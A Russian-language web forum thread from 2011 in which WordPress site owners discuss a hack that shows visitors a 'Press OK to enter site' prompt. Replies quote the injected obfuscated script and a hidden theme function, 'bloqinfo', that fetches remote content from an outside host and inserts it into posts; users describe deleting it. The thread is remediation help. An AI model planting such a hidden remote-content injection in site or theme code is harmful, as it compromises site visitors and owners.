[Помогите] Press Ok to enter site. Откуда?

Тема в разделе "Wordpress", создана пользователем k0missar, 22 сен 2011.

Статус темы:
Закрыта.
Модераторы: DzSoft, Sorcus
  1. k0missar

    k0missar

    Регистр.:
    20 сен 2008
    Сообщения:
    200
    Симпатии:
    25
    Press Ok to enter site. Мой сайт взломан. Помогите!

    Когда захожу в любую статью выдает сообщение Press Ok to enter site
    Почему и как исправить?
    qqdps.ru
     
  2. evoll

    evoll Создатель

    Регистр.:
    2 авг 2009
    Сообщения:
    37
    Симпатии:
    5
    ищи по этому коду
    <script>var _0xdd82=["cookie","realauth=iGdkiRXqXQa","location"];if (confirm('Press OK to enter site.')){ document[_0xdd82[0]]=_0xdd82[1];document[_0xdd82[2]]=document[_0xdd82[2]];}</script> по файлам сайта откуда эта гадость цепляется. возможно цепляет с mysql базы которую подломали тебе
     
  3. k0missar

    k0missar

    Регистр.:
    20 сен 2008
    Сообщения:
    200
    Симпатии:
    25
    в коде сайта нет.
    а как проверить базу?
    если смогли занести эту инфу в базу значит и пасс могли выдернуть? и даже если я его поменял снова могут выдернуть
     
  4. NulleTop

    NulleTop localhost

    Регистр.:
    3 окт 2009
    Сообщения:
    258
    Симпатии:
    37
    Скорее всего, эта строчка закодирована в base64, поэтому в коде её не нашли... А БД можно проверить - сделайте дамп и откройте его в блокноте. и там поиском пользуйтесь.
     
  5. k0missar

    k0missar

    Регистр.:
    20 сен 2008
    Сообщения:
    200
    Симпатии:
    25
    чет не могу найти в дампе подобные строки... по какому запросу вы бы искали???
     
  6. rostya

    rostya Постоялец

    Регистр.:
    28 май 2009
    Сообщения:
    55
    Симпатии:
    3
    Такая же проблема случилась. Восстановил базу из бэкапа, не помогает. Проверил фалы сайта, ничего подобного не нашел. Что еще может быть ?!?!
    Ситуация такая
    При просмотре исходного кода в постах, есть этот самый код

    <div id="content">

    <script>var _0xdd82=["cookie","realauth=iGdkiRXqXQa","location"];if (confirm('Press OK to enter site.')){ document[_0xdd82[0]]=_0xdd82[1];document[_0xdd82[2]]=document[_0xdd82[2]];}</script>
    <div class="post" id="post-118">

    Проблема устранена таким образом (по крайней мере мне это помогло)
    В файле singl.php ищем вот это <?=bloqinfo($post->ID) ?>, удаляем.
    Далее в файле functions.php удаляем (у меня такой код был)
    function bloqinfo($wp_id){
    static $wp_count = 0;
    if($wp_count == 0){
    $wp_count++;
    return @file_get_contents('http://wpru.ru/aksimet.php?id='.$wp_id.'&m=17');
    }
    }
    Мне это помогло
     
  7. k0missar

    k0missar

    Регистр.:
    20 сен 2008
    Сообщения:
    200
    Симпатии:
    25
    Да, мне тоже помогло, только я вел тему сразу на трех форумах) и на одном из них дали ссылку на решение проблемы
    http://madinski.org.ua/archives/2568
     
  8. via55

    via55 Писатель

    Регистр.:
    24 сен 2011
    Сообщения:
    3
    Симпатии:
    0
    У меня та же самая проблема

    Представители хостинга утверждают, что это вирус, проникший на виртуальный сервер, путём кражи пароля у программы - FTP-клиента. Знакомые веб-мастера говорят, что это взлом сайта, советуют поменять тему. С чего хотя бы начать, посоветуйте, пожалуйста.
     
  9. bravilor

    bravilor

    Регистр.:
    25 июл 2007
    Сообщения:
    436
    Симпатии:
    152
    Удалить все пароли с FTP-клиента, сменить тему.
    А вообще жесть какая-то, у меня уже второй сайт ломанули, удалили все файлы кроме wp-content, хз зачем, залили обычный index.html с баннером какой-то албанской хакерской группы.
     
  10. kikabidze

    kikabidze

    Регистр.:
    18 авг 2010
    Сообщения:
    292
    Симпатии:
    30
    Давайте собирать статистику, какая версия вордпресса была, какая тема и откуда взята?
    Как ставить заплатки и искать дыры, если сайтов много? :) очень не хочется все вручную колбасить :(
     
Статус темы:
Закрыта.